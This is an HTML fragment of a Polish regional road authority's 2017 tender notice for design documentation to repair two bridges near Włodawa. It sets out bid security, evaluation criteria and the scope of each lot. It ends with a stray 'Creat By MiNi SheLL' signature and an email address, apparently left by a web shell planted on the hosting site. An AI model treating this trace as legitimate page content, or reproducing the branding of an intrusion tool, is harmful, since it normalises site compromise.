3.W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę, Zamawiający może zwrócić się do właściwych organów odpowiedniego kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu. 
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości:
 750,00 zł/zadanie (słownie złotych: siedemset pięćdziesiąt 00/100 na każde zadanie)
2.Wadium może być wnoszone w jednej lub kilku następujących formach zgodnie z 
art. 45, ust. 6 ustawy Prawo zamówień publicznych:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -
kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. z 2014 poz. 1804).
3.Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW w
Lublinie do banku PKO Bank Polski SA na nr 74 1020 3147 0000 8002 0105 5730 
z dopiskiem Opracowanie dokumentacji na remont mostu Zadanie Nr ..
4.   W ofercie należy złożyć dokument potwierdzający wniesienie wadium.
UWAGA:
1. Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy 
Prawo zamówień publicznych, tzn. przelewem na rachunek bankowy 
wskazany przez Zamawiającego" W myśl art. 63 ust. 3 pkt. 1 ustawy Prawo
bankowe z dnia 29 sierpnia  997 r. (Dz. U. z 2015 r. poz. 128) polecenie
przelewu jest jedną z form rozliczenia bezgotówkowego. Zgodnie z art. 63c) 
Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję
dłużnika obciążenia jego rachunku określona kwotą i uznania   tą kwotą 
rachunku wierzyciela. Oznacza to, że wpłata gotówkowa wadium wnoszona na
poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu wyżej
cytowanych artykułów.
2. Wadium wnoszone przelewem (art. 45 ust. 7 ustawy Pzp) uważa się za wniesione 
w  terminie, jeżeli wpłynie na konto ZDW w Lublinie przed upływem terminu                składania ofert.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin wykonania</td><td>20</td></tr><tr><td>Doświadczenie projektanta</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zmiany i uzupełnienia treści Umowy wymagają dla swej ważności formy pisemnej.
2. Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej Umowy w stosunku do treści oferty, polegających na:
1) zmianie wynagrodzenia Umowy w przypadku, gdy zmianie uległy stawki podatku VAT
 wynagrodzenie ulegnie zmianie w ten sposób, że wynagrodzenie netto pozostanie
takie samo, a wartość podatku VAT i wynagrodzenie brutto ulegną zmianie.
2) zmianie podwykonawcy - podmiotu, na którego zasoby Wykonawca powoływał się
w złożonej ofercie, na zasadach określonych w art. 22a ust. 1 ustawy Pzp, w celu
wykazania spełniania warunków udziału w postępowaniu - w przypadku akceptacji
przez Zamawiającego wskazanego innego podwykonawcy po wykazaniu, iż 
proponowany inny podwykonawca spełnia je w stopniu nie mniejszym niż podwykonawca
na którego zasoby Wykonawca się powołuje w trakcie postępowania o udzielenie 
zamówienia.
3) rezygnacji z podwykonawcy - podmiotu, na którego zasoby Wykonawca powoływał
się w złożonej ofercie, na zasadach określonych w art. 22a ustawy pzp, w celu
wykazania spełniania warunków udziału w postępowaniu - w przypadku wykazania
Zamawiającemu, iż Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż
podwykonawca na którego zasoby Wykonawca powołuje się w trakcie postępowania
o udzielenie zamówienia.
4) powierzeniu podwykonawcy realizacji części zamówienia  w przypadku, gdy
Wykonawca w ofercie nie wskazał części, którą na etapie realizacji zamówienia
zamierza powierzyć podwykonawcy. W takim przypadku Wykonawca winien 	  	    stosować zasady wynikające z § 12 umowy.
3. Strony zgodnie postanawiają, że wymienione w ust. 2 niniejszego paragrafu przypadki dopuszczające zmianę Umowy nie stanowią zobowiązania Stron do dokonania takiej zmiany.
4. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
5. W przypadku, o którym mowa w pkt. 4, Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 29/03/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1. Oferty należy złożyć w siedzibie Zamawiającego - Zarząd Dróg Wojewódzkich w Lublinie,Rejon Dróg Wojewódzkich we Włodawie, ul. Lubelska 60, w pokoju nr 5 (sekretariat), 
2. Oferty zostaną otwarte w siedzibie Zamawiającego - Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie, ul. Lubelska 60 w pokoju nr 6,
w dniu 29.03.2017 r. o godz. 09:10.
3. Niezwłocznie po otwarciu ofert zamawiający zamieszcza na stronie internetowej    informacje dotyczące:
1) kwoty, jaką zamierza przeznaczyć na sfinansowanie zamówienia;
2) firm oraz adresów wykonawców, którzy złożyli oferty w terminie;
3) ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności                zawartych w ofertach.
</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>Zadanie Nr 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Opracowanie dokumentacji projektowej na remont mostu  przez rzekę Piwonię                                w m. Sosnowica w ciągu drogi  wojewódzkiej Nr 819; Parczew - Przewłoka                                 Sosnowica - Kołacze  Wola Uhruska , w km  19+147
A. Stan istniejący:
A.1. Konstrukcja mostu:
Most jednoprzęsłowy o schemacie statycznym belkowym swobodnie podpartym bez wsporników. Konstrukcja płytowa, płyta monolityczna o pełnym przekroju.
Podpory pełnościenne o korpusie pełnym;.
Nośność wg ewid. 30 ton;.
Most wybudowany w 1959 roku;.
A.2. Podstawowe parametry techniczno- użytkowe mostu:
rozpiętość teoretyczna 6,90 m;
szerokość całkowita  11,40 m;
w tym : jezdnia 6,25m i obustronne opaski 2x0,50 m
B.Zakres opracowania:
B.1. Sporządzenie materiałów zgłoszeniowych (do dokonania zgłoszenia remontu istniejącego mostu do Lubelskiego Urzędu Wojewódzkiego w Lublinie Wydział Infrastruktury  w ilości 2 egz.
B.2. Opracowanie projektu wykonawczego z pełną inwentaryzacją uszkodzeń obiektu 
(z  uwzględnieniem minimalnych robót na dojazdach) - w ilości 4 egz.
Projekt wykonawczy należy opracować przy zachowaniu podstawowych  parametrów techniczno  użytkowych  obiektu. Projekt wykonawczy powinien obejmować kompleksowy remont mostu,  a w  szczególności:
wymianę izolacji i nawierzchni,
remont płyty(nadbeton płyty), belek podporęczowych z wymianą istniejących poręczy  na barieroporęcze,
naprawę i zabezpieczenie antykorozyjne konstrukcji betonowych /płyta, przyczółki/,
wykonanie dylatacji,
remont stożków, schodów i urządzeń odwadniających
korektę niwelety na dojazdach w zakresie minimalnym koniecznym do dostosowania jej do niwelety na moście.
zabezpieczenie wodociągu na czas remontu.
wykonanie nowych zawiesi wodociągu dostosowanych do remontowanego mostu.
zabezpieczenie antykorozyjne wodociągu.
B.3.Opracowanie kosztorysu inwestorskiego w formacie Norma PRO   w ilości 2 egz.
B.4.Przedmiar robót  w ilości 4 egz.
B.5.Kosztorys ofertowy  w ilości 4 egz.
B.6.Specyfikacje techniczne wykonania i odbioru robót budowlanychw ilości 4 egz.
B.7.Projekt organizacji ruchu na czas prowadzonych robót (przewidzieć wykonanie robót przy zachowaniu ciągłości ruchu na obiekcie), zatwierdzony przez Dyrektora Zarządu Dróg Wojewódzkich w Lublinie - w ilości 4 egz.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71322300-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  24022.25<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 45<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin wykonania</td><td>20</td></tr><tr><td>Doświadczenie projektanta</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Zadanie Nr 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>opracowanie dokumentacji projektowej na remont mostu  przez rzekę rów bez nazwy w m. Zbereże w ciągu drogi  wojewódzkiej Nr 816;
Terespol - Kodeń - Sławatycze - Włodawa  Dorohusk  Zosin, w km 85+789
A. Stan istniejący:
A.1. Konstrukcja mostu:
Most jednoprzęsłowy o schemacie statycznym belkowym swobodnie podpartym bez wsporników. Konstrukcja płytowa, płyta monolityczna o pełnym przekroju          typu GROMNIK.
Podpory pełnościenne o korpusie pełnym;
Nośność wg ewid. 30 ton;
Most wybudowany w 1978 roku;
A.2. Podstawowe parametry techniczno- użytkowe mostu:
rozpiętość teoretyczna 12,30 m;
szerokość całkowita  9,40 m;
w tym : jezdnia 5,5m i obustronne opaski o wymiarach : 2,45 m i  1,0 m.
B. Zakres opracowania:
B.1. Sporządzenie materiałów zgłoszeniowych (do dokonania zgłoszenia remontu istniejącego mostu do Lubelskiego Urzędu Wojewódzkiego w Lublinie Wydział Infrastruktury  w ilości 2 egz.
B.2. Opracowanie projektu wykonawczego z pełną inwentaryzacją uszkodzeń obiektu 
(z uwzględnieniem minimalnych robót na dojazdach) - w ilości 4 egz.
Projekt wykonawczy należy opracować przy zachowaniu podstawowych parametrów techniczno  użytkowych obiektu. Projekt wykonawczy powinien obejmować kompleksowy remont mostu, a w szczególności:
wymianę izolacji i nawierzchni;
remont płyty, (nadbeton płyty) belek podporęczowych z wymianą istniejących poręczy  na barieroporęcze;
naprawę i zabezpieczenie antykorozyjne konstrukcji betonowych /płyta, przyczółki/;
wykonanie dylatacji;
remont stożków, schodów i urządzeń odwadniających;
korektę niwelety na dojazdach w zakresie minimalnym koniecznym do dostosowania jej do niwelety na moście.
B.3.Opracowanie kosztorysu inwestorskiego w formacie Norma PRO  w ilości 2 egz.
B.4.Przedmiar robót  w ilości 4 egz.
B.5.Kosztorys ofertowy  w ilości 4 egz.
B.6.Specyfikacje techniczne wykonania i odbioru robót budowlanychw ilości 4 egz. 
B.7.Projekt organizacji ruchu na czas prowadzonych robót  zatwierdzony przez Dyrektora Zarządu Dróg Wojewódzkich w Lublinie (przewidzieć wykonanie robót przy zachowaniu ciągłości ruchu na obiekcie)   w ilości 4 egz.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71322300-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  24022.25<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 45<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin wykonania</td><td>20</td></tr><tr><td>doświadczenie projektanta</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com